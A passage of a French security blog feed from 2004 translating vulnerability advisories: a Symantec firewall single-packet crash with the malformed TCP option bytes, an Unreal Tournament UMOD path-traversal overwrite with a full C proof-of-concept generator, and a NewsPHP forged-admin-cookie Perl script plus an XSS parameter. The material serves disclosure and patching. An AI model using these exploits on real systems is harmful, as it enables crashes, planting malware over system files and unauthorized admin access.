/&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Description : &lt;br /&gt;************* &lt;br /&gt;eEye Digital Security a découvert une faille de sécurité sérieuse de type "denial of service" dans les pare-feux pour Windows de Symantec. La faille permettrait à un agresseur distant de rendre le système inopérant à l'aide d'un seul paquet. La machine sera planté et il faut un accès "physique" pour rebooter. Cette faille existe au sein du composant qui enregistre les paquets TCP. &lt;br /&gt;&lt;br /&gt;Description technique : &lt;br /&gt;*********************** &lt;br /&gt;La faille existe dans SYMNDIS.SYS quand un paquet TCP essaye de se répandre dans les options TCP. Si un agresseur envoie un paquet TCP unique, avec option TCP de type SACK (05) ou Alternate Checksum Data (0F) suivie de 00/ Le driver SYMNDIS.SYS entre dans un loop infini qui va causer le crash total du système. Il faut un hard boot avec un accès physique au système pour rendre le système de nouveau opérationnel. L'agresseur a seulement besoin d'envoyer un seul paquet sur n'importe quel port du sytème, même si ce port est fermé. La faille est accessible même si le pare-feu ou IDS sont activé/désactivés. Ci-dessous, vous trouverez un morceau du paquet TCP SYN (longueur totale de 44 bytes) avec une mauvaise option SACK TCP. &lt;br /&gt;&lt;br /&gt;40 00 57 4B 00 00 01 01 05 00 &lt;br /&gt;&lt;br /&gt;Le code vulnérable maintient un offset dans les bytes de l'option TCP et essaye de dépasser une longueur variable d'option en ajoutant sa longueur à l'offset. Si la longueur du champ de l'option est égale à 0, cela causera un loop infini et la crash du système. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit nécessaire. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Mettre à jour son pare-feu via LiveUpdate. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: EEYE &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://www.security-corporation.com/articles-20040424-000.html &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108445885265586725?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445885265586725'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445885265586725'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108445885265586725' title='Symantec Multiple Firewall TCP Options Denial of Service Vulnerability'/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108445879811953396</id><published>2004-05-13T16:32:00.000+02:00</published><updated>2004-05-13T16:33:18.120+02:00</updated><title type='text'>Epic Games Unreal Tournament Engine UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability </title><content type='html'>Sujet: Epic Games Unreal Tournament Engine UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability &lt;br /&gt;Versions: Epic Games Unreal Engine versions 2003 &lt;br /&gt;Auteur: Luigi Auriemma &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 22 avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Il a été rapporté que le moteur 3D d'Unreal Tournament est victime d'une faille de re-écriture de fichier en local à cause du fichier UMOD manifest.ini . Cette faille est due à une erreur de validation qui permettrait à un utilisateur malveillant de d'utiliser des fichiers arbitraires pour écrire et éventuellement arriver à un "denial of service" total. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit nécessaire. &lt;br /&gt;&lt;br /&gt;Preuve du concept : &lt;br /&gt;******************* &lt;br /&gt;Cette fonction est utilisée pour calculer le checksum CRC utilisé dans les fichiers umod. &lt;br /&gt;Les 2 méthodes : &lt;br /&gt;printf("CRC: 0x%08lx\n", umodcrc("test.umod", 0)); &lt;br /&gt;&lt;br /&gt;fd = fopen("test.umod", "rb");printf("CRC: 0x%08lx\n", umodcrc(NULL, fd); &lt;br /&gt;&lt;br /&gt;Valeur de renvoi : &lt;br /&gt;0xffffffff (-1) ou la valeur du fichier CRC &lt;br /&gt;&lt;br /&gt;En pratique, si vous transformez NULL en extension de fichier, la fonction utilisera le fichier descriptif comme second argument, autrement la fonction ouvrira le fichier en utilisant les premier paramètre. &lt;br /&gt;&lt;br /&gt;Cette source est couverte par GNU.GPL &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;*/ &lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt; &lt;br /&gt;#include &lt;stdlib.h&gt; &lt;br /&gt;#include &lt;string.h&gt; &lt;br /&gt;#include &lt;sys/stat.h&gt; &lt;br /&gt;#include "umodcrc.h" &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#ifndef u_long &lt;br /&gt;#define u_long unsigned long &lt;br /&gt;&lt;br /&gt;#endif &lt;br /&gt;&lt;br /&gt;#ifndef u_char &lt;br /&gt;&lt;br /&gt;#define u_char unsigned char &lt;br /&gt;&lt;br /&gt;#endif &lt;br /&gt;&lt;br /&gt;#define UT2BUFFSZ 0x4000 &lt;br /&gt;&lt;br /&gt;/* complete CRC calculation */ &lt;br /&gt;&lt;br /&gt;u_long umodcrc( &lt;br /&gt;&lt;br /&gt;u_char *filename, /* name of the file for CRC calculation */ &lt;br /&gt;&lt;br /&gt;FILE *fdopen /* FILE descriptor */ &lt;br /&gt;&lt;br /&gt;); &lt;br /&gt;/* CRC algorithm */ &lt;br /&gt;u_long appmemcrc( &lt;br /&gt;&lt;br /&gt;u_char *data, /* buffer containing the data from the file */ &lt;br /&gt;&lt;br /&gt;u_long size, /* size of the data */ &lt;br /&gt;&lt;br /&gt;u_long oldcrc /* previous CRC, it must start from 0 */ &lt;br /&gt;&lt;br /&gt;); &lt;br /&gt;&lt;br /&gt;u_long gcrctable[] = { &lt;br /&gt;0x00000000, 0x04c11db7, 0x09823b6e, 0x0d4326d9, &lt;br /&gt;0x130476dc, 0x17c56b6b, 0x1a864db2, 0x1e475005, &lt;br /&gt;0x2608edb8, 0x22c9f00f, 0x2f8ad6d6, 0x2b4bcb61, &lt;br /&gt;0x350c9b64, 0x31cd86d3, 0x3c8ea00a, 0x384fbdbd, &lt;br /&gt;0x4c11db70, 0x48d0c6c7, 0x4593e01e, 0x4152fda9, &lt;br /&gt;0x5f15adac, 0x5bd4b01b, 0x569796c2, 0x52568b75, &lt;br /&gt;0x6a1936c8, 0x6ed82b7f, 0x639b0da6, 0x675a1011, &lt;br /&gt;0x791d4014, 0x7ddc5da3, 0x709f7b7a, 0x745e66cd, &lt;br /&gt;0x9823b6e0, 0x9ce2ab57, 0x91a18d8e, 0x95609039, &lt;br /&gt;0x8b27c03c, 0x8fe6dd8b, 0x82a5fb52, 0x8664e6e5, &lt;br /&gt;0xbe2b5b58, 0xbaea46ef, 0xb7a96036, 0xb3687d81, &lt;br /&gt;0xad2f2d84, 0xa9ee3033, 0xa4ad16ea, 0xa06c0b5d, &lt;br /&gt;0xd4326d90, 0xd0f37027, 0xddb056fe, 0xd9714b49, &lt;br /&gt;0xc7361b4c, 0xc3f706fb, 0xceb42022, 0xca753d95, &lt;br /&gt;0xf23a8028, 0xf6fb9d9f, 0xfbb8bb46, 0xff79a6f1, &lt;br /&gt;0xe13ef6f4, 0xe5ffeb43, 0xe8bccd9a, 0xec7dd02d, &lt;br /&gt;0x34867077, 0x30476dc0, 0x3d044b19, 0x39c556ae, &lt;br /&gt;0x278206ab, 0x23431b1c, 0x2e003dc5, 0x2ac12072, &lt;br /&gt;0x128e9dcf, 0x164f8078, 0x1b0ca6a1, 0x1fcdbb16, &lt;br /&gt;0x018aeb13, 0x054bf6a4, 0x0808d07d, 0x0cc9cdca, &lt;br /&gt;0x7897ab07, 0x7c56b6b0, 0x71159069, 0x75d48dde, &lt;br /&gt;0x6b93dddb, 0x6f52c06c, 0x6211e6b5, 0x66d0fb02, &lt;br /&gt;0x5e9f46bf, 0x5a5e5b08, 0x571d7dd1, 0x53dc6066, &lt;br /&gt;0x4d9b3063, 0x495a2dd4, 0x44190b0d, 0x40d816ba, &lt;br /&gt;0xaca5c697, 0xa864db20, 0xa527fdf9, 0xa1e6e04e, &lt;br /&gt;0xbfa1b04b, 0xbb60adfc, 0xb6238b25, 0xb2e29692, &lt;br /&gt;0x8aad2b2f, 0x8e6c3698, 0x832f1041, 0x87ee0df6, &lt;br /&gt;0x99a95df3, 0x9d684044, 0x902b669d, 0x94ea7b2a, &lt;br /&gt;0xe0b41de7, 0xe4750050, 0xe9362689, 0xedf73b3e, &lt;br /&gt;0xf3b06b3b, 0xf771768c, 0xfa325055, 0xfef34de2, &lt;br /&gt;0xc6bcf05f, 0xc27dede8, 0xcf3ecb31, 0xcbffd686, &lt;br /&gt;0xd5b88683, 0xd1799b34, 0xdc3abded, 0xd8fba05a, &lt;br /&gt;0x690ce0ee, 0x6dcdfd59, 0x608edb80, 0x644fc637, &lt;br /&gt;0x7a089632, 0x7ec98b85, 0x738aad5c, 0x774bb0eb, &lt;br /&gt;0x4f040d56, 0x4bc510e1, 0x46863638, 0x42472b8f, &lt;br /&gt;0x5c007b8a, 0x58c1663d, 0x558240e4, 0x51435d53, &lt;br /&gt;0x251d3b9e, 0x21dc2629, 0x2c9f00f0, 0x285e1d47, &lt;br /&gt;0x36194d42, 0x32d850f5, 0x3f9b762c, 0x3b5a6b9b, &lt;br /&gt;0x0315d626, 0x07d4cb91, 0x0a97ed48, 0x0e56f0ff, &lt;br /&gt;0x1011a0fa, 0x14d0bd4d, 0x19939b94, 0x1d528623, &lt;br /&gt;0xf12f560e, 0xf5ee4bb9, 0xf8ad6d60, 0xfc6c70d7, &lt;br /&gt;0xe22b20d2, 0xe6ea3d65, 0xeba91bbc, 0xef68060b, &lt;br /&gt;0xd727bbb6, 0xd3e6a601, 0xdea580d8, 0xda649d6f, &lt;br /&gt;0xc423cd6a, 0xc0e2d0dd, 0xcda1f604, 0xc960ebb3, &lt;br /&gt;0xbd3e8d7e, 0xb9ff90c9, 0xb4bcb610, 0xb07daba7, &lt;br /&gt;0xae3afba2, 0xaafbe615, 0xa7b8c0cc, 0xa379dd7b, &lt;br /&gt;0x9b3660c6, 0x9ff77d71, 0x92b45ba8, 0x9675461f, &lt;br /&gt;0x8832161a, 0x8cf30bad, 0x81b02d74, 0x857130c3, &lt;br /&gt;0x5d8a9099, 0x594b8d2e, 0x5408abf7, 0x50c9b640, &lt;br /&gt;0x4e8ee645, 0x4a4ffbf2, 0x470cdd2b, 0x43cdc09c, &lt;br /&gt;0x7b827d21, 0x7f436096, 0x7200464f, 0x76c15bf8, &lt;br /&gt;0x68860bfd, 0x6c47164a, 0x61043093, 0x65c52d24, &lt;br /&gt;0x119b4be9, 0x155a565e, 0x18197087, 0x1cd86d30, &lt;br /&gt;0x029f3d35, 0x065e2082, 0x0b1d065b, 0x0fdc1bec, &lt;br /&gt;0x3793a651, 0x3352bbe6, 0x3e119d3f, 0x3ad08088, &lt;br /&gt;0x2497d08d, 0x2056cd3a, 0x2d15ebe3, 0x29d4f654, &lt;br /&gt;0xc5a92679, 0xc1683bce, 0xcc2b1d17, 0xc8ea00a0, &lt;br /&gt;0xd6ad50a5, 0xd26c4d12, 0xdf2f6bcb, 0xdbee767c, &lt;br /&gt;0xe3a1cbc1, 0xe760d676, 0xea23f0af, 0xeee2ed18, &lt;br /&gt;0xf0a5bd1d, 0xf464a0aa, 0xf9278673, 0xfde69bc4, &lt;br /&gt;0x89b8fd09, 0x8d79e0be, 0x803ac667, 0x84fbdbd0, &lt;br /&gt;0x9abc8bd5, 0x9e7d9662, 0x933eb0bb, 0x97ffad0c, &lt;br /&gt;0xafb010b1, 0xab710d06, 0xa6322bdf, 0xa2f33668, &lt;br /&gt;0xbcb4666d, 0xb8757bda, 0xb5365d03, 0xb1f740b4 }; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;u_long umodcrc(u_char *filename, FILE *fdopen) { &lt;br /&gt;FILE *fd; &lt;br /&gt;int err, &lt;br /&gt;len; &lt;br /&gt;u_char *buff; &lt;br /&gt;u_long crc = 0x00000000, &lt;br /&gt;oldoff = 0; &lt;br /&gt;struct stat xstat; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if(filename) { &lt;br /&gt;&lt;br /&gt;fd = fopen(filename, "rb"); &lt;br /&gt;&lt;br /&gt;if(!fd) return(-1); &lt;br /&gt;&lt;br /&gt;} else { &lt;br /&gt;&lt;br /&gt;fd = fdopen; &lt;br /&gt;oldoff = ftell(fd); // methodic and ordinate 8-) &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;err = fstat(fileno(fd), &amp;xstat); &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if(err &lt; 0) return(-1); &lt;br /&gt;if(xstat.st_size &gt;= 20) xstat.st_size -= 20; &lt;br /&gt;&lt;br /&gt;else return(-1); &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;buff = malloc(UT2BUFFSZ); &lt;br /&gt;if(!buff) return(-1); &lt;br /&gt;len = UT2BUFFSZ; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;do { &lt;br /&gt;&lt;br /&gt;if(len &gt; xstat.st_size) len = xstat.st_size; &lt;br /&gt;err = fread(buff, len, 1, fd); &lt;br /&gt;if(err != 1) break; &lt;br /&gt;crc = appmemcrc(buff, len, crc); &lt;br /&gt;xstat.st_size -= len; &lt;br /&gt;&lt;br /&gt;} while(xstat.st_size); &lt;br /&gt;&lt;br /&gt;if(filename) fclose(fd); &lt;br /&gt;&lt;br /&gt;else fseek(fd, oldoff, SEEK_SET); &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;free(buff); &lt;br /&gt;&lt;br /&gt;return(crc); &lt;br /&gt;&lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;u_long appmemcrc(u_char *data, u_long size, u_long oldcrc) &lt;br /&gt;{ &lt;br /&gt;&lt;br /&gt;oldcrc = ~oldcrc; &lt;br /&gt;&lt;br /&gt;for(; size &gt; 0; size--, data++) { &lt;br /&gt;&lt;br /&gt;oldcrc = (oldcrc &lt;&lt; 8) ^ gcrctable[*data ^ (oldcrc &gt;&gt; 24)]; &lt;br /&gt;&lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;return(~oldcrc); &lt;br /&gt;&lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;/********************************************************************/ &lt;br /&gt;&lt;br /&gt;#ifdef WIN32 &lt;br /&gt;#include &lt;direct.h&gt; &lt;br /&gt;#include &lt;malloc.h&gt; &lt;br /&gt;&lt;br /&gt;#define u_long unsigned long &lt;br /&gt;#define u_char unsigned char &lt;br /&gt;#else &lt;br /&gt;#include &lt;unistd.h&gt; &lt;br /&gt;#include &lt;sys/stat.h&gt; &lt;br /&gt;#endif &lt;br /&gt;&lt;br /&gt;#define VER "0.1" &lt;br /&gt;#define BUFFSZ 16384 &lt;br /&gt;#define UMODSIGN 0x9fe3c5a3 &lt;br /&gt;#define MANIFEST \ &lt;br /&gt;"[Setup]\n" \ &lt;br /&gt;"Product=Arbitrary file ovewriting by Luigi Auriemma\n" \ &lt;br /&gt;"Version=1\n" \ &lt;br /&gt;"Archive=%s\n" \ &lt;br /&gt;"SrcPath=.\n" \ &lt;br /&gt;"MasterPath=..\n" \ &lt;br /&gt;"StartProduct=UMODPoC\n" \ &lt;br /&gt;"\n" \ &lt;br /&gt;"Group=SetupGroup\n" \ &lt;br /&gt;"\n" \ &lt;br /&gt;"[SetupGroup]\n" \ &lt;br /&gt;"Copy=(Src="MANINI",Master="MANINI",Flags=3)\n" \ &lt;br /&gt;"File=(Src=%s)\n" &lt;br /&gt;#define MANINI "System\\Manifest.ini" &lt;br /&gt;&lt;br /&gt;void std_err(void); &lt;br /&gt;void io_err(void); &lt;br /&gt;&lt;br /&gt;int main(int argc, char *argv[]) { &lt;br /&gt;FILE *fdin, &lt;br /&gt;*fdmod; &lt;br /&gt;u_char *buff; &lt;br /&gt;u_long offset, &lt;br /&gt;manifestsz; &lt;br /&gt;int err; &lt;br /&gt;struct stat xstat; &lt;br /&gt;struct end { &lt;br /&gt;u_long sign; &lt;br /&gt;u_long indexstart; &lt;br /&gt;u_long indexend; &lt;br /&gt;u_long one; &lt;br /&gt;u_long crc; &lt;br /&gt;} end; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;setbuf(stdout, NULL); &lt;br /&gt;&lt;br /&gt;fputs("\n" &lt;br /&gt;"UMOD arbitrary file overwriting proof-of-concept maker "VER"\n" &lt;br /&gt;" Vulnerable games:\n" &lt;br /&gt;" - Unreal Tournament &lt;= 451b\n" &lt;br /&gt;" - Unreal Tournament 2003 &lt;= 2225\n" &lt;br /&gt;"by Luigi Auriemma\n" &lt;br /&gt;"e-mail: aluigi@altervista.org\n" &lt;br /&gt;"web: http://aluigi.altervista.org\n" &lt;br /&gt;"\n", stdout); &lt;br /&gt;&lt;br /&gt;if(argc &lt; 4) { &lt;br /&gt;printf("\n" &lt;br /&gt;"Usage: %s &lt;malicious_file&gt; &lt;\"fake_file_name\"&gt; &lt;file.umod/ut2mod&gt;\n" &lt;br /&gt;"\n" &lt;br /&gt;"You must use a filename with directory traversal exploitation\n" &lt;br /&gt;"For example:\n" &lt;br /&gt;"..\\..\\..\\autoexec.bat\n" &lt;br /&gt;"..\\..\\..\\windows\\system.ini\n" &lt;br /&gt;"\n" &lt;br /&gt;"Simple usage example:\n" &lt;br /&gt;"\n" &lt;br /&gt;"%s malicious.exe \"..\\..\\..\\windows\\notepad.exe\" useme.umod\n" &lt;br /&gt;"\n", argv[0], argv[0]); &lt;br /&gt;exit(1); &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;printf("Opening %s\n", argv[1]); &lt;br /&gt;fdin = fopen(argv[1], "rb"); &lt;br /&gt;if(!fdin) std_err(); &lt;br /&gt;err = fstat(fileno(fdin), &amp;xstat); &lt;br /&gt;if(err &lt; 0) std_err(); &lt;br /&gt;printf("Size: %lu\n\n", xstat.st_size); &lt;br /&gt;&lt;br /&gt;buff = malloc(BUFFSZ + 1); &lt;br /&gt;if(!buff) std_err(); &lt;br /&gt;&lt;br /&gt;manifestsz = snprintf( &lt;br /&gt;buff, &lt;br /&gt;BUFFSZ, &lt;br /&gt;MANIFEST, &lt;br /&gt;argv[3], &lt;br /&gt;argv[2]); &lt;br /&gt;&lt;br /&gt;printf("Build virtual "MANINI"\n" &lt;br /&gt;"Size: %lu\n" &lt;br /&gt;"\n", manifestsz); &lt;br /&gt;&lt;br /&gt;printf("Creating %s\n\n", argv[3]); &lt;br /&gt;fdmod = fopen(argv[3], "wb"); &lt;br /&gt;if(!fdmod) std_err(); &lt;br /&gt;&lt;br /&gt;if(fwrite(buff, manifestsz, 1, fdmod) != 1) io_err(); &lt;br /&gt;err = manifestsz; &lt;br /&gt;while(err &amp; 0xf) { /* useless but all the UMODs does the same */ &lt;br /&gt;fputc(0x00, fdmod); &lt;br /&gt;err++; &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;offset = ftell(fdmod); // malicious file offset &lt;br /&gt;&lt;br /&gt;while(1) { &lt;br /&gt;err = fread(buff, 1, BUFFSZ, fdin); &lt;br /&gt;if(!err) break; &lt;br /&gt;if(fwrite(buff, err, 1, fdmod) != 1) io_err(); &lt;br /&gt;} &lt;br /&gt;fclose(fdin); &lt;br /&gt;err = ftell(fdmod); &lt;br /&gt;while(err &amp; 0xf) { /* useless but all the UMODs does the same */ &lt;br /&gt;fputc(0x00, fdmod); &lt;br /&gt;err++; &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;end.indexstart = err; // starting of index &lt;br /&gt;&lt;br /&gt;fputc(2, fdmod); // number of files &lt;br /&gt;&lt;br /&gt;fputc(sizeof(MANINI) - 1, fdmod); // filename size &lt;br /&gt;fwrite(MANINI, sizeof(MANINI) - 1, 1, fdmod); // filename &lt;br /&gt;fwrite("\x00\x00\x00\x00", 4, 1, fdmod); // starting offset &lt;br /&gt;fwrite((void *)&amp;manifestsz, 4, 1, fdmod); // size of the file &lt;br /&gt;fwrite("\x03\x00\x00\x00", 4, 1, fdmod); // flag &lt;br /&gt;&lt;br /&gt;err = strlen(argv[2]) + 1; &lt;br /&gt;fputc(err, fdmod); &lt;br /&gt;fwrite(argv[2], err, 1, fdmod); &lt;br /&gt;fwrite((void *)&amp;offset, 4, 1, fdmod); &lt;br /&gt;fwrite((void *)&amp;xstat.st_size, 4, 1, fdmod); &lt;br /&gt;fwrite("\x00\x00\x00\x00", 4, 1, fdmod); &lt;br /&gt;&lt;br /&gt;end.sign = UMODSIGN; // umod sign &lt;br /&gt;end.indexend = ftell(fdmod) + sizeof(end); // index ending &lt;br /&gt;end.one = 1; // 1 &lt;br /&gt;end.crc = 0x00000000; // crc (calculated later) &lt;br /&gt;&lt;br /&gt;fwrite((void *)&amp;end, sizeof(end), 1, fdmod); &lt;br /&gt;&lt;br /&gt;/* crc checking */ &lt;br /&gt;fflush(fdmod); &lt;br /&gt;end.crc = umodcrc(argv[3], 0); &lt;br /&gt;fseek(fdmod, -4, SEEK_CUR); &lt;br /&gt;fwrite((void *)&amp;end.crc, 4, 1, fdmod); &lt;br /&gt;&lt;br /&gt;fclose(fdmod); &lt;br /&gt;&lt;br /&gt;printf("\n" &lt;br /&gt;"Informations about %s:\n" &lt;br /&gt;"-------------------\n" &lt;br /&gt;"Index section offset: 0x%08lx\n" &lt;br /&gt;"Total package size: %lu\n" &lt;br /&gt;"CRC: %08lx\n" &lt;br /&gt;"\n" &lt;br /&gt;"Files contained:\n" &lt;br /&gt;MANINI" (used for installation)\n" &lt;br /&gt;"%s\n" &lt;br /&gt;"\n" &lt;br /&gt;"Proof-of-concept successfully created!\n", &lt;br /&gt;argv[3], &lt;br /&gt;end.indexstart, &lt;br /&gt;end.indexend, &lt;br /&gt;end.crc, &lt;br /&gt;argv[2]); &lt;br /&gt;&lt;br /&gt;return(0); &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;void std_err(void) { &lt;br /&gt;perror("\nError"); &lt;br /&gt;exit(1); &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;void io_err(void) { &lt;br /&gt;fputs("\nError: I/O error, the file is incomplete or the disk space is finished\n", stdout); &lt;br /&gt;exit(1); &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Cette faille a été corrigé dans la dernière version du jeu Unreal Tournament 2004. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Luigi Auriemma &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://www.securityfocus.com/bid/10196/info/ &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108445879811953396?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445879811953396'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445879811953396'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108445879811953396' title='Epic Games Unreal Tournament Engine UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108445851025015105</id><published>2004-05-13T16:28:00.000+02:00</published><updated>2004-05-13T16:32:04.950+02:00</updated><title type='text'>NewsPHP Admin Access and Cross Site Scripting Vulnerability </title><content type='html'>Sujet: NewsPHP Admin Access and Cross Site Scripting Vulnerability &lt;br /&gt;Versions: NewsPHP (toutes versions) &lt;br /&gt;Auteur: Manuel Lopez &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 12 avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Description : &lt;br /&gt;************* &lt;br /&gt;NewsPHP est une solution de publication Web, comme un magazine, journal ou portail de news online. Il marche comme un gestionnaire de contenu qu'il est facile d'installer et de gérer sans avoir à uploader par FTP à chaque fois que vous voulez faire des mises à jour. &lt;br /&gt;&lt;br /&gt;Vulnérabilités : &lt;br /&gt;*************** &lt;br /&gt;Une faille de sécurité dans l'application permet aux agresseurs de passer pour des administrateurs en plaçant un faux cookie Administrateur sur leur ordinateur. &lt;br /&gt;&lt;br /&gt;Une faille dans le File Upload du panel Admin permet aux utilisateurs d'uploader du code arbitraire à la place d'un fichier vidéo. &lt;br /&gt;&lt;br /&gt;Cette application est aussi vulnérable aux attaques de type CSS (Cross Site Scripting). &lt;br /&gt;&lt;br /&gt;Vulnérabilité du cookie: &lt;br /&gt;************************ &lt;br /&gt;Cette faille est causée parce que les datas du cookie ne sont pas proprement vérifiées pour les droits administrateurs. &lt;br /&gt;Ceci est le cookie et le POC pour accèder aux droits admin dans NewsPHP : &lt;br /&gt;&lt;br /&gt;### autorized=admin; root=admin ### &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------ &lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl -w &lt;br /&gt;## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm &lt;br /&gt;&lt;br /&gt;use IO::Socket; &lt;br /&gt;if (@ARGV &lt; 3) &lt;br /&gt;{ &lt;br /&gt;print "\n\n"; &lt;br /&gt;print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n"; &lt;br /&gt;print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n"; &lt;br /&gt;print "By: Manuel Lopez mantra at gulo.org\n"; &lt;br /&gt;print "\n\n"; &lt;br /&gt;exit(1); &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;$host = $ARGV[0]; &lt;br /&gt;$directorio = $ARGV[1]; &lt;br /&gt;$fichero = $ARGV[2]; &lt;br /&gt;&lt;br /&gt;print "\n"; &lt;br /&gt;print "----- Conecting .. ====\n\n"; &lt;br /&gt;$socket = IO::Socket::INET-&gt;new(Proto  "tcp", &lt;br /&gt;PeerAddr "$host",PeerPort "80") || die "$socket error $!"; &lt;br /&gt;print " Conected\n"; &lt;br /&gt;print " Sending Data .. \n"; &lt;br /&gt;$socket-print(fin) or die "write: $!"; &lt;br /&gt;GET http://$host/$directorio/ HTTP/1.1 &lt;br /&gt;Cookie: autorized=admin; root=admin &lt;br /&gt;&lt;br /&gt;fin &lt;br /&gt;print " OK\n"; &lt;br /&gt;print " Generating $fichero ...\n"; &lt;br /&gt;open( Result, "$fichero"); &lt;br /&gt;print Result while &lt;$socket&gt;; &lt;br /&gt;close Result; &lt;br /&gt;&lt;br /&gt;##--------------------------&lt;br /&gt;&lt;br /&gt;Cross-Site Scripting : &lt;br /&gt;********************** &lt;br /&gt;Un utilisateur distant peut conduire une attaque de type CSS à cause d'une faille dans la validation de la variable cat_id. &lt;br /&gt;/index.php?cat_id=[XSS] &lt;br /&gt;&lt;br /&gt;Vulnérabilité de l'upload de fichier : &lt;br /&gt;************************************** &lt;br /&gt;Un utilisateur avec les droits privilégiés peut uploader du code exécutable à la place d'une vidéo dans le panel Administration. Une fois que le code est uploadé, un utilisateur peut exécuter du code en appelant ce fichier, au travers d'un serveur Web. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit n'est nécessaire. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |